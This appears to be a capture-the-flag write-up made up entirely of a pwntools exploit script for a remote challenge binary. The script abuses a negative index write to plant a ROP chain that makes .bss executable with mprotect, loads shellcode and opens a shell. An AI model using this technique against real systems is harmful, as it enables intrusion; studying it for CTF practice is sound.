Tags: pwn
Rating: 1.0
```
from pwn import *
context.arch = 'amd64'
p = remote('168.119.108.148', 11010)
def write(index, data):
p.sendlineafter(":", str(index))
p.sendafter(":", data)
write(0, b'AAAA\n')
write(1, b'BBBB\n')
write(2, b'AAAA\n')
mprotect = 0x4080EA
fgets = 0x4019A5
stdin = 0x40C040
bss = 0x000000000040b000
pop_rdi = 0x0000000000401b0d
pop_rsi = 0x00000000004019a3
pop_rdx = 0x0000000000403d23
payload = p64(0)
# mprotect
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(pop_rsi)
payload += p64(0x10000)
payload += p64(pop_rdx)
payload += p64(0x7)
payload += p64(mprotect)
# fgets
payload += p64(pop_rdi)
payload += p64(bss + 0x900)
payload += p64(pop_rsi)
payload += p64(0x80)
payload += p64(pop_rdx)
payload += p64(stdin)
payload += p64(fgets)
# run shellcode
payload += p64(bss + 0x901)
write(-2, payload)
p.sendline(asm(shellcraft.sh()))
p.interactive()
```
